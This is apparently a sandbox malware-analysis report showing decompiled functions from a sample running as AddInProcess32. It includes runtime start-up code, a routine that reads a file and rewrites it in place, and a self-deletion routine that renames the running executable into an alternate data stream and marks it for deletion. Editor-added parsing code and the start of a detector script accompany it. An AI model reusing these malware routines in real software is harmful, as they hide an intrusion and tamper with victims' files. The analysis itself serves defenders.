                                              							__eflags = _t106 - 0xffffffff;
                                              							if(_t106 == 0xffffffff) {
                                              								L42:
                                              								_t57 =  &(_t112[1]);
                                              								 *_t57 = _t112[1] | 0x00000040;
                                              								__eflags =  *_t57;
                                              								 *_t112 = 0xfffffffe;
                                              								goto L43;
                                              							} else {
                                              								__eflags = _t106;
                                              								if(_t106 == 0) {
                                              									goto L42;
                                              								}
                                              								_t71 = GetFileType(_t106);
                                              								__eflags = _t71;
                                              								if(_t71 == 0) {
                                              									goto L42;
                                              								}
                                              								 *_t112 = _t106;
                                              								_t72 = _t71 & 0x000000ff;
                                              								__eflags = _t72 - 2;
                                              								if(__eflags != 0) {
                                              									__eflags = _t72 - 3;
                                              									if(__eflags == 0) {
                                              										_t52 =  &(_t112[1]);
                                              										 *_t52 = _t112[1] | 0x00000008;
                                              										__eflags =  *_t52;
                                              									}
                                              								} else {
                                              									_t112[1] = _t112[1] | 0x00000040;
                                              								}
                                              								_push(0xfa0);
                                              								_t54 =  &(_t112[3]); // -4283092
                                              								_t61 = E00407B82(_t88, _t102, _t106, _t112, __eflags);
                                              								__eflags = _t61;
                                              								if(_t61 == 0) {
                                              									goto L45;
                                              								} else {
                                              									_t112[2] = _t112[2] + 1;
                                              									goto L43;
                                              								}
                                              							}
                                              						} else {
                                              							_t112[1] = _t112[1] | 0x00000080;
                                              						}
                                              						L43:
                                              						_t88 = _t88 + 1;
                                              					} while (_t88 < 3);
                                              					SetHandleCount( *0x415ac8);
                                              					_t62 = 0;
                                              					goto L46;
                                              				}
                                              				_t74 =  *(_t119 - 0x30);
                                              				if(_t74 == 0) {
                                              					goto L26;
                                              				}
                                              				_t107 =  *_t74;
                                              				_t89 =  &(_t74[1]);
                                              				 *(_t119 - 0x1c) = _t89 + _t107;
                                              				if(_t107 >= 0x800) {
                                              					_t107 = 0x800;
                                              				}
                                              				_t114 = 1;
                                              				while( *0x415ac8 < _t107) {
                                              					_t77 = E00407C87(0x20, 0x38);
                                              					__eflags = _t77;
                                              					if(__eflags == 0) {
                                              						_t107 =  *0x415ac8;
                                              						L17:
                                              						 *(_t119 - 0x20) =  *(_t119 - 0x20) & 0x00000000;
                                              						if(_t107 <= 0) {
                                              							goto L26;
                                              						} else {
                                              							goto L18;
                                              						}
                                              						do {
                                              							L18:
                                              							_t98 =  *( *(_t119 - 0x1c));
                                              							if(_t98 != 0xffffffff && _t98 != 0xfffffffe) {
                                              								_t79 =  *_t89;
                                              								if((_t79 & 0x00000001) == 0) {
                                              									goto L25;
                                              								}
                                              								if((_t79 & 0x00000008) != 0) {
                                              									L23:
                                              									_t118 = ( *(_t119 - 0x20) & 0x0000001f) * 0x38 + 0x415ae0[ *(_t119 - 0x20) >> 5];
                                              									 *_t118 =  *( *(_t119 - 0x1c));
                                              									_t118[1] =  *_t89;
                                              									_push(0xfa0);
                                              									_t39 =  &(_t118[3]); // 0xc
                                              									_t61 = E00407B82(_t89, _t102, _t107, _t118, _t132);
                                              									if(_t61 == 0) {
                                              										goto L45;
                                              									}
                                              									_t118[2] = _t118[2] + 1;
                                              									goto L25;
                                              								}
                                              								_t86 = GetFileType(_t98);
                                              								_t132 = _t86;
                                              								if(_t86 == 0) {
                                              									goto L25;
                                              								}
                                              								goto L23;
                                              							}
                                              							L25:
                                              							 *(_t119 - 0x20) =  *(_t119 - 0x20) + 1;
                                              							_t89 =  &(_t89[0]);
                                              							 *(_t119 - 0x1c) =  &(( *(_t119 - 0x1c))[1]);
                                              						} while ( *(_t119 - 0x20) < _t107);
                                              						goto L26;
                                              					}
                                              					_t101 =  &(0x415ae0[_t114]);
                                              					 *_t101 = _t77;
                                              					 *0x415ac8 =  *0x415ac8 + 0x20;
                                              					_t18 =  &(_t77[0x1c0]); // 0x700
                                              					_t102 = _t18;
                                              					while(1) {
                                              						__eflags = _t77 - _t102;
                                              						if(_t77 >= _t102) {
                                              							break;
                                              						}
                                              						_t77[1] = 0;
                                              						 *_t77 =  *_t77 | 0xffffffff;
                                              						_t77[1] = 0xa;
                                              						_t77[2] = _t77[2] & 0x00000000;
                                              						_t77[9] = _t77[9] & 0x00000080;
                                              						_t77[9] = 0xa;
                                              						_t77[9] = 0xa;
                                              						_t77 =  &(_t77[0xe]);
                                              						_t102 =  &(( *_t101)[0x1c0]);
                                              						__eflags = _t102;
                                              					}
                                              					_t114 = _t114 + 1;
                                              					__eflags = _t114;
                                              				}
                                              				goto L17;
                                              			}

                                              Instruction address range of the listing above: 0x00407844 - 0x00407a83 (the per-line opcode address column is not reproduced)
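The listing above is the Visual C++ CRT's `_ioinit`, not loader logic: the 0x800 cap on inherited handles, the `E00407C87(0x20, 0x38)` allocation of 32 `ioinfo` slots of 0x38 bytes per `__pioinfo` chunk (`0x415ae0`, with `_nhandle` at `0x415ac8`), the 0xfa0 spin count passed to `___crtInitCritSecAndSpinCount`, the `_osfile` bits 0x01/0x08/0x40/0x80 and the `GetStartupInfoA`/`GetStdHandle`/`GetFileType`/`SetHandleCount` set all match the statically linked runtime. What the first loop parses is the `STARTUPINFO.lpReserved2` block that a parent CRT uses to hand open file descriptors to a child. The C below is an added example by the editor, not code from the sample or from the Joe Sandbox report: it decodes such a block from constructed input and applies the same adopt/skip rules. Assumptions: the `GetFileType` probe is reported rather than performed so the code runs off Windows; the names `FEOFLAG`, `FCRLF`, `FNOINHERIT` and `FAPPEND` are the CRT's remaining `_osfile` bits and do not appear in this listing.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* MSVC CRT _osfile bits (internal.h). The listing tests 0x01, 0x08, 0x40, 0x80;
 * the other four are the CRT's remaining bits, named here for completeness. */
enum osfile_bits {
    FOPEN = 0x01, FEOFLAG = 0x02, FCRLF = 0x04, FPIPE = 0x08,
    FNOINHERIT = 0x10, FAPPEND = 0x20, FDEV = 0x40, FTEXT = 0x80
};

#define IOINIT_MAX_HANDLES 0x800u   /* the clamp at "if(_t107 >= 0x800)" */

typedef struct {
    uint32_t handle;   /* 32-bit HANDLE, as in this x86 sample */
    uint8_t  flags;    /* _osfile byte */
} inherited_fd;

/* Decode STARTUPINFO.lpReserved2 the way the listing walks it:
 *   [0..4)          uint32 count                    (*_t74)
 *   [4 .. 4+count)  one flag byte per fd            (_t89)
 *   [4+count ..)    one 32-bit handle per fd, offset by the UNclamped count
 * Returns entries written (count clamped to 0x800 and out_cap), or -1 when buf is
 * shorter than the declared layout; the shown lines perform no such length check. */
int parse_reserved2(const uint8_t *buf, size_t len, inherited_fd *out, size_t out_cap)
{
    uint32_t declared;
    if (buf == NULL || len < 4) return -1;
    memcpy(&declared, buf, 4);                      /* little-endian host assumed */
    if ((uint64_t)4 + 5ull * declared > len) return -1;
    const uint8_t *flags = buf + 4, *handles = flags + declared;
    size_t n = declared < IOINIT_MAX_HANDLES ? declared : IOINIT_MAX_HANDLES;
    if (n > out_cap) n = out_cap;
    for (size_t i = 0; i < n; i++) {
        out[i].flags = flags[i];
        memcpy(&out[i].handle, handles + 4 * i, 4);
    }
    return (int)n;
}

/* Per-entry decision of the first loop (L18..L25 in the listing): skip handles -1/-2
 * and entries without FOPEN; pipes are adopted untested, anything else only if
 * GetFileType() != FILE_TYPE_UNKNOWN. That probe is Windows-only, so it is
 * reported through *needs_filetype instead of performed. */
int ioinit_would_adopt(const inherited_fd *e, int *needs_filetype)
{
    *needs_filetype = 0;
    if (e->handle == 0xFFFFFFFFu || e->handle == 0xFFFFFFFEu) return 0;
    if (!(e->flags & FOPEN)) return 0;
    if (!(e->flags & FPIPE)) *needs_filetype = 1;
    return 1;
}

/* Bits the second loop ORs in for std handles 0..2 from GetFileType():
 * FILE_TYPE_CHAR (2) -> FDEV, FILE_TYPE_PIPE (3) -> FPIPE, otherwise nothing. */
uint8_t std_handle_extra_flags(uint32_t file_type)
{
    switch (file_type & 0xFF) { case 2: return FDEV; case 3: return FPIPE; default: return 0; }
}

/* Render an _osfile byte as "FOPEN|FTEXT" (or "0"). */
const char *format_osfile(uint8_t f, char *dst, size_t cap)
{
    static const struct { uint8_t bit; const char *name; } tab[] = {
        {FOPEN, "FOPEN"}, {FEOFLAG, "FEOFLAG"}, {FCRLF, "FCRLF"}, {FPIPE, "FPIPE"},
        {FNOINHERIT, "FNOINHERIT"}, {FAPPEND, "FAPPEND"}, {FDEV, "FDEV"}, {FTEXT, "FTEXT"} };
    dst[0] = '\0';
    for (size_t i = 0; i < sizeof tab / sizeof tab[0]; i++)
        if (f & tab[i].bit) {
            if (dst[0]) strncat(dst, "|", cap - strlen(dst) - 1);
            strncat(dst, tab[i].name, cap - strlen(dst) - 1);
        }
    if (!dst[0]) strncat(dst, "0", cap - 1);
    return dst;
}

/* Serialise a constructed lpReserved2 block (test input, not captured from the sample). */
size_t build_reserved2(const inherited_fd *fds, uint32_t count, uint8_t *buf, size_t cap)
{
    size_t need = 4 + 5 * (size_t)count;
    if (cap < need) return 0;
    memcpy(buf, &count, 4);
    for (uint32_t i = 0; i < count; i++) {
        buf[4 + i] = fds[i].flags;
        memcpy(buf + 4 + count + 4 * i, &fds[i].handle, 4);
    }
    return need;
}

/* Count the fds the listing would adopt from a block; -1 on a malformed block. */
int count_adopted(const uint8_t *buf, size_t len)
{
    inherited_fd fds[IOINIT_MAX_HANDLES];
    int n = parse_reserved2(buf, len, fds, IOINIT_MAX_HANDLES), adopted = 0, probe;
    for (int i = 0; i < n; i++) adopted += ioinit_would_adopt(&fds[i], &probe);
    return n < 0 ? -1 : adopted;
}

int main(void)
{
    /* Constructed block: a text file, a pipe, an INVALID_HANDLE_VALUE slot, a closed slot. */
    const inherited_fd sample[4] = {
        {0x1c, FOPEN | FTEXT}, {0x24, FOPEN | FPIPE}, {0xFFFFFFFFu, FOPEN}, {0x30, 0} };
    uint8_t blk[4 + 5 * 4];
    inherited_fd out[4];
    size_t len = build_reserved2(sample, 4, blk, sizeof blk);
    int n = parse_reserved2(blk, len, out, 4);
    for (int i = 0; i < n; i++) {
        char s[64]; int probe;
        int adopt = ioinit_would_adopt(&out[i], &probe);
        printf("fd %d: handle 0x%08x %-12s -> %s%s\n", i, out[i].handle,
               format_osfile(out[i].flags, s, sizeof s), adopt ? "adopt" : "skip",
               probe ? " (after GetFileType)" : "");
    }
    printf("adopted: %d of %d\n", count_adopted(blk, len), n);
    return 0;
}
```

Two details worth keeping in mind when reading the decompilation: the handle array is located with the count as read from the block, and only afterwards is the loop bound clamped to 0x800, which the parser reproduces; and the shown lines read the count and both arrays without consulting any length, which is why the example takes an explicit `len` and rejects a block that declares more entries than it carries.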

                                              APIs
                                              • GetStartupInfoA.KERNEL32(?), ref: 00407859
                                              • __calloc_crt.LIBCMT ref: 0040786C
                                                • Part of subcall function 00407C87: __calloc_impl.LIBCMT ref: 00407C95
                                                • Part of subcall function 00407C87: Sleep.KERNEL32(00000000,00406611,00000001,00000214), ref: 00407CAC
                                              • __calloc_crt.LIBCMT ref: 004078EF
                                              • GetFileType.KERNEL32(00000038), ref: 0040796F
                                              • ___crtInitCritSecAndSpinCount.LIBCMT ref: 004079A3
                                              • GetStdHandle.KERNEL32(-000000F6), ref: 004079F9
                                              • GetFileType.KERNEL32(00000000), ref: 00407A0B
                                              • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00407A39
                                              • SetHandleCount.KERNEL32 ref: 00407A63
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Count$CritFileHandleInitSpinType___crt__calloc_crt$InfoSleepStartup__calloc_impl
                                              • String ID:
                                              • API String ID: 1318386821-0
                                              • Opcode ID: c3d4f8456791a988d50b6682e00ba2af4a87bac8f78f88e13e203df50547b23e
                                              • Instruction ID: 69dbfb245cb0b330f8ea7ce656b2dbe2117018d0c8ec9728b90aae803ce677d5
                                              • Opcode Fuzzy Hash: c3d4f8456791a988d50b6682e00ba2af4a87bac8f78f88e13e203df50547b23e
                                              • Instruction Fuzzy Hash: 24610AB1E4C7418ED7108B78C844B567BA0AF52334F29837AD4A5BB2E1D73CB845CB1A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 79%
                                              			E00405CC9(void* __ecx, void* __eflags, int _a4, intOrPtr _a8) {
                                              				signed int _v8;
                                              				char _v21;
                                              				char _v22;
                                              				struct _cpinfo _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed int _t53;
                                              				int _t56;
                                              				signed char _t59;
                                              				intOrPtr _t61;
                                              				short* _t62;
                                              				int _t65;
                                              				signed int _t66;
                                              				signed char* _t76;
                                              				signed int _t79;
                                              				intOrPtr _t81;
                                              				void* _t82;
                                              				signed int _t85;
                                              				intOrPtr* _t86;
                                              				int _t90;
                                              				signed char _t91;
                                              				signed int _t92;
                                              				int _t93;
                                              				int _t97;
                                              				signed int _t99;
                                              				signed int _t104;
                                              				void* _t108;
                                              				intOrPtr* _t110;
                                              				signed int _t112;
                                              
                                              				_t53 =  *0x413004; // 0x98fc836b
                                              				_v8 = _t53 ^ _t112;
                                              				_t81 = _a8;
                                              				_t97 = E00405C4F(_a4);
                                              				_t117 = _t97;
                                              				_a4 = _t97;
                                              				if(_t97 != 0) {
                                              					_v32 = 0;
                                              					_t56 = 0;
                                              					__eflags = 0;
                                              					while(1) {
                                              						__eflags =  *((intOrPtr*)(_t56 + 0x4136d8)) - _t97;
                                              						if( *((intOrPtr*)(_t56 + 0x4136d8)) == _t97) {
                                              							break;
                                              						}
                                              						_v32 = _v32 + 1;
                                              						_t56 = _t56 + 0x30;
                                              						__eflags = _t56 - 0xf0;
                                              						if(_t56 < 0xf0) {
                                              							continue;
                                              						} else {
                                              							__eflags = _t97 - 0xfde8;
                                              							if(_t97 == 0xfde8) {
                                              								L35:
                                              								_t65 = _t56 | 0xffffffff;
                                              								__eflags = _t65;
                                              							} else {
                                              								__eflags = _t97 - 0xfde9;
                                              								if(_t97 == 0xfde9) {
                                              									goto L35;
                                              								} else {
                                              									_t56 = IsValidCodePage(_t97 & 0x0000ffff);
                                              									__eflags = _t56;
                                              									if(_t56 == 0) {
                                              										goto L35;
                                              									} else {
                                              										_t56 = GetCPInfo(_t97,  &_v28);
                                              										__eflags = _t56;
                                              										if(_t56 == 0) {
                                              											__eflags =  *0x4144b0;
                                              											if(__eflags != 0) {
                                              												goto L1;
                                              											} else {
                                              												goto L35;
                                              											}
                                              										} else {
                                              											E00409280(_t97, _t81 + 0x1c, 0, 0x101);
                                              											__eflags = _v28 - 1;
                                              											 *(_t81 + 4) = _t97;
                                              											 *((intOrPtr*)(_t81 + 0xc)) = 0;
                                              											if(_v28 <= 1) {
                                              												 *((intOrPtr*)(_t81 + 8)) = 0;
                                              											} else {
                                              												__eflags = _v22;
                                              												if(_v22 != 0) {
                                              													_t110 =  &_v21;
                                              													while(1) {
                                              														_t91 =  *_t110;
                                              														__eflags = _t91;
                                              														if(_t91 == 0) {
                                              															goto L29;
                                              														}
                                              														_t79 =  *(_t110 - 1) & 0x000000ff;
                                              														_t92 = _t91 & 0x000000ff;
                                              														while(1) {
                                              															__eflags = _t79 - _t92;
                                              															if(_t79 > _t92) {
                                              																break;
                                              															}
                                              															 *(_t81 + _t79 + 0x1d) =  *(_t81 + _t79 + 0x1d) | 0x00000004;
                                              															_t79 = _t79 + 1;
                                              															__eflags = _t79;
                                              														}
                                              														_t110 = _t110 + 2;
                                              														__eflags =  *(_t110 - 1);
                                              														if( *(_t110 - 1) != 0) {
                                              															continue;
                                              														}
                                              														goto L29;
                                              													}
                                              												}
                                              												L29:
                                              												_t76 = _t81 + 0x1e;
                                              												_t90 = 0xfe;
                                              												do {
                                              													 *_t76 =  *_t76 | 0x00000008;
                                              													_t76 =  &(_t76[1]);
                                              													_t90 = _t90 - 1;
                                              													__eflags = _t90;
                                              												} while (_t90 != 0);
                                              												 *((intOrPtr*)(_t81 + 0xc)) = E0040599D( *(_t81 + 4));
                                              												 *((intOrPtr*)(_t81 + 8)) = 1;
                                              											}
                                              											asm("stosd");
                                              											asm("stosd");
                                              											asm("stosd");
                                              											L25:
                                              											E00405A21(_t81);
                                              											goto L2;
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              						goto L36;
                                              					}
                                              					E00409280(_t97, _t81 + 0x1c, 0, 0x101);
                                              					_t85 = _v32 * 0x30;
                                              					_v36 = 0;
                                              					_t104 = _t85 + 0x4136e8;
                                              					_v32 = _t104;
                                              					while(1) {
                                              						L21:
                                              						__eflags =  *_t104;
                                              						if( *_t104 == 0) {
                                              							break;
                                              						}
                                              						_t59 =  *(_t104 + 1);
                                              						__eflags = _t59;
                                              						if(_t59 != 0) {
                                              							_t99 =  *_t104 & 0x000000ff;
                                              							_t66 = _t59 & 0x000000ff;
                                              							while(1) {
                                              								__eflags = _t99 - _t66;
                                              								if(_t99 > _t66) {
                                              									break;
                                              								}
                                              								 *(_t81 + _t99 + 0x1d) =  *(_t81 + _t99 + 0x1d) |  *(_v36 + 0x4136d4);
                                              								_t66 =  *(_t104 + 1) & 0x000000ff;
                                              								_t99 = _t99 + 1;
                                              								__eflags = _t99;
                                              							}
                                              							_t97 = _a4;
                                              							_t104 = _t104 + 2;
                                              							__eflags = _t104;
                                              							continue;
                                              						}
                                              						break;
                                              					}
                                              					_v36 = _v36 + 1;
                                              					_t104 = _v32 + 8;
                                              					__eflags = _v36 - 4;
                                              					_v32 = _t104;
                                              					if(_v36 < 4) {
                                              						goto L21;
                                              					}
                                              					 *(_t81 + 4) = _t97;
                                              					 *((intOrPtr*)(_t81 + 8)) = 1;
                                              					_t61 = E0040599D(_t97);
                                              					 *((intOrPtr*)(_t81 + 0xc)) = _t61;
                                              					_t62 = _t81 + 0x10;
                                              					_t86 = _t85 + 0x4136dc;
                                              					_t93 = 6;
                                              					do {
                                              						 *_t62 =  *_t86;
                                              						_t86 = _t86 + 2;
                                              						_t62 = _t62 + 2;
                                              						_t93 = _t93 - 1;
                                              						__eflags = _t93;
                                              					} while (_t93 != 0);
                                              					goto L25;
                                              				} else {
                                              					L1:
                                              					E004059CC(_t81, _t117);
                                              					L2:
                                              					_t65 = 0;
                                              				}
                                              				L36:
                                              				_pop(_t108);
                                              				_pop(_t82);
                                              				E0040318A(_t65, _t82, _v8 ^ _t112, _t108);
                                              				return _t65;
                                              			}

                                              APIs
                                              • getSystemCP.LIBCMT ref: 00405CE2
                                                • Part of subcall function 00405C4F: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00405C5C
                                                • Part of subcall function 00405C4F: GetOEMCP.KERNEL32(00000000), ref: 00405C76
                                              • setSBCS.LIBCMT ref: 00405CF4
                                                • Part of subcall function 004059CC: _memset.LIBCMT ref: 004059DF
                                              • IsValidCodePage.KERNEL32(-00000030), ref: 00405D3A
                                              • GetCPInfo.KERNEL32(00000000,?), ref: 00405D4D
                                              • _memset.LIBCMT ref: 00405D65
                                              • setSBUpLow.LIBCMT ref: 00405E38
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
                                              • String ID:
                                              • API String ID: 2658552758-0
                                              • Opcode ID: ec85c08ce6dd7219b9a68a7b6597c8f394aac1bdbade679ca7a276b608924005
                                              • Instruction ID: d2136bea0d1a2f065ec75707fb5b56249d955542dcdf0261cb1fe3d024273208
                                              • Opcode Fuzzy Hash: ec85c08ce6dd7219b9a68a7b6597c8f394aac1bdbade679ca7a276b608924005
                                              • Instruction Fuzzy Hash: BC5100719046549BDB258F65C8846BFBBB5EF04304F14847BD886BF282C63C8A42CFD8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 96%
                                              			E02B53B3F(void* __ebx, WCHAR* __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                              				signed int _v8;
                                              				void _v32;
                                              				long _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				long _v48;
                                              				WCHAR* _v52;
                                              				signed int _t27;
                                              				void* _t30;
                                              				void* _t52;
                                              				signed int _t59;
                                              				signed int _t71;
                                              				long _t72;
                                              				void* _t75;
                                              				WCHAR* _t76;
                                              				void* _t77;
                                              				signed int _t78;
                                              
                                              				_t27 =  *0x2b56004; // 0xbb40e64e (stack cookie)
                                              				_v8 = _t27 ^ _t78;
                                              				_t75 = __edx; // six-DWORD parameter block, copied into _v32 below
                                              				_v52 = __ecx; // path of the file that is read and later rewritten
                                              				_v40 = _v40 & 0;
                                              				_v44 = _v44 & 0;
                                              				_v36 = 0;
                                              				// E02B529B2 opens the file for reading (see subcall APIs below) and returns a heap buffer in _v40 and a length in _v44
                                              				_t30 = E02B529B2(__ecx,  &_v40,  &_v44);
                                              				_t52 = _v40;
                                              				if(_t30 != 0) {
                                              					// continue only when the parameter block is not all zero
                                              					if(( *__edx | __edx[1]) != 0 || (__edx[2] | __edx[3]) != 0) {
                                              						L4:
                                              						_t59 = 6;
                                              						memcpy( &_v32, _t75, _t59 << 2); // 6 DWORDs = 24 bytes
                                              						_t71 = _v44;
                                              						// _t85 is only assigned on the else branch below; the decompiler did not resolve this operand
                                              						if(E02B51CC7(_t52, _t52, _t71, _t71, _t75, _t85,  &_v32) == 0) {
                                              							L11:
                                              						} else {
                                              							_t76 = _v52;
                                              							_t72 = _t71 - 8; // all but the last 8 bytes of the buffer are written back
                                              							DeleteFileW(_t76);
                                              							_t77 = CreateFileW(_t76, 0x10000000, 0, 0, 2, 0, 0); // 0x10000000 = GENERIC_ALL, 2 = CREATE_ALWAYS
                                              							if(_t77 == 0xffffffff) {
                                              								goto L11;
                                              							} else {
                                              								_v48 = _v48 & 0x00000000;
                                              								// a failed or short write is treated as an error
                                              								if(WriteFile(_t77, _t52, _t72,  &_v48, 0) == 0 || _v48 != _t72) {
                                              									CloseHandle(_t77);
                                              									goto L11;
                                              								} else {
                                              									CloseHandle(_t77);
                                              									goto L9;
                                              								}
                                              							}
                                              						}
                                              					} else {
                                              						_t85 = __edx[4] | __edx[5];
                                              						if((__edx[4] | __edx[5]) != 0) {
                                              							goto L4;
                                              						}
                                              					}
                                              				}
                                              				if(_t52 != 0) {
                                              					HeapFree(GetProcessHeap(), 0, _t52); // release the buffer returned by E02B529B2
                                              				}
                                              				return E02B53C33(_v8 ^ _t78); // stack-cookie check
                                              			}

                                              APIs
                                                • Part of subcall function 02B529B2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,02B5140A,?), ref: 02B529CD
                                                • Part of subcall function 02B529B2: GetFileSize.KERNEL32(00000000,?,?,00000000,?,02B5140A,?), ref: 02B529E7
                                                • Part of subcall function 02B529B2: CloseHandle.KERNEL32(00000000,?,00000000,?,02B5140A,?), ref: 02B529EE
                                              • DeleteFileW.KERNEL32(?,0000014F,00000000,?,?,?,?,?,?,?,?,?,?,?,?,02B512AA), ref: 02B53BB9
                                              • CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,00000000,00000000), ref: 02B53BCD
                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02B53BE7
                                              • CloseHandle.KERNEL32(00000000), ref: 02B53BF7
                                              • CloseHandle.KERNEL32(00000000), ref: 02B53C03
                                              • GetProcessHeap.KERNEL32(00000000,?,0000014F,00000000,?), ref: 02B53C13
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02B512AA,?,00000000), ref: 02B53C1A
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: File$CloseHandle$CreateHeap$DeleteFreeProcessSizeWrite
                                              • String ID:
                                              • API String ID: 4205881660-0
                                              • Opcode ID: d49c32cbf44349db9387eb28d0649dd6840c5ac462b91cc8bb9e17ee6b418741
                                              • Instruction ID: 8118c94e3ea83e338effb02e91c85935fc12eebfcfe8035b735b4269fc43f21c
                                              • Opcode Fuzzy Hash: d49c32cbf44349db9387eb28d0649dd6840c5ac462b91cc8bb9e17ee6b418741
                                              • Instruction Fuzzy Hash: 36318F32E00328AFDB11DF68D844BEEB7F9EF48361F144599E915EB240CB30A9458B64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 73%
                                              			E02B52D50(void* __ebx, void* __edi, void* __esi) {
                                              				signed int _v8;
                                              				short _v528;
                                              				char _v548;
                                              				intOrPtr _v552;
                                              				char _v560;
                                              				char _v561;
                                              				signed int _t14;
                                              				intOrPtr _t24;
                                              				char* _t28;
                                              				void* _t48;
                                              				signed int _t49;
                                              
                                              				_t14 =  *0x2b56004; // 0xbb40e64e (stack cookie)
                                              				_v8 = _t14 ^ _t49;
                                              				// _v560.._v548 holds a FILE_RENAME_INFO structure and _v561 a FILE_DISPOSITION_INFO flag; both are zeroed first
                                              				E02B52CE7(E02B52CE7(_t14 ^ _t49,  &_v560, 0x20),  &_v561, 1);
                                              				GetModuleFileNameW(0,  &_v528, 0x104); // path of the running image itself
                                              				_t48 = CreateFileW( &_v528, 0x10000, 0, 0, 3, 0x80, 0); // 0x10000 = DELETE access, 3 = OPEN_EXISTING
                                              				if(_t48 != 0xffffffff) {
                                              					_t24 = 4;
                                              					_v552 = _t24; // FileNameLength: L":y" is two WCHARs = 4 bytes
                                              					E02B52CC6( &_v548, L":y", _t24); // FileName = ":y", an alternate data stream name
                                              					_t28 =  &_v560;
                                              					__imp__SetFileInformationByHandle(_t48, 3, _t28, _v552 + 0x10); // 3 = FileRenameInfo: the primary stream is renamed into the ":y" stream
                                              					if(_t28 == 0) { // the decompiler reused _t28 for the BOOL result; zero means the rename failed
                                              						L4:
                                              						CloseHandle(_t48);
                                              					} else {
                                              						CloseHandle(_t48);
                                              						_t48 = CreateFileW( &_v528, 0x10000, 0, 0, 3, 0x80, 0); // reopen the file with DELETE access
                                              						if(_t48 != 0xffffffff) {
                                              							_v561 = 1;
                                              							__imp__SetFileInformationByHandle(_t48, 4,  &_v561, 1); // 4 = FileDispositionInfo, DeleteFile = TRUE: the file is removed when the handle closes
                                              							goto L4;
                                              						}
                                              					}
                                              				}
                                              				return E02B53C33(_v8 ^ _t49); // stack-cookie check
                                              			}

                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 02B52D93
                                              • CreateFileW.KERNEL32(?,00010000,00000000,00000000,00000003,00000080,00000000,?,00000000), ref: 02B52DAF
                                              • SetFileInformationByHandle.KERNEL32(00000000,00000003,?,?), ref: 02B52DF1
                                              • CloseHandle.KERNEL32(00000000), ref: 02B52E04
                                              • CreateFileW.KERNEL32(?,00010000,00000000,00000000,00000003,00000080,00000000), ref: 02B52E1E
                                              • SetFileInformationByHandle.KERNEL32(00000000,00000004,?,00000001), ref: 02B52E3E
                                              • CloseHandle.KERNEL32(00000000), ref: 02B52E47
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: File$Handle$CloseCreateInformation$ModuleName
                                              • String ID:
                                              • API String ID: 4136099801-0
                                              • Opcode ID: 3bd3f897773d6a1344295400bfd898daf4910950a1b769de12eb9f80f35f3339
                                              • Instruction ID: 451fee0f2823fa6e798d77c0a79a1ad60c90258088eab8019a44a33cff32ae2a
                                              • Opcode Fuzzy Hash: 3bd3f897773d6a1344295400bfd898daf4910950a1b769de12eb9f80f35f3339
                                              • Instruction Fuzzy Hash: 2521F8B29413287BD7219BA4EC89FEB737CEB48760F1401D5FE05EB1C0DA705E858AA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%
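
The API sequence listed above for this function is the rename-then-mark-for-deletion way of removing a running executable's own image: GetModuleFileNameW with a NULL module handle (the caller's own path), CreateFileW with dwDesiredAccess 0x00010000 (DELETE) and dwCreationDisposition 3 (OPEN_EXISTING), SetFileInformationByHandle with information class 3 (FileRenameInfo), CloseHandle, a second DELETE-access open, and SetFileInformationByHandle with class 4 (FileDispositionInfo) and dwBufferSize 1, which is sizeof(FILE_DISPOSITION_INFO). The rename destination (commonly an alternate data stream of the same file) and the DeleteFile value are not recoverable from this listing, where those arguments appear as "?". The Python below is an added example, not code from the report or from the sample: it parses the seven API lines above (embedded as constructed input in the report's own line format) and flags that ordered pattern while decoding the raw constants. The functions parse_api_line, explain and detect_self_delete, the line regex and the trace format assumptions are the example's own.

```python
import re
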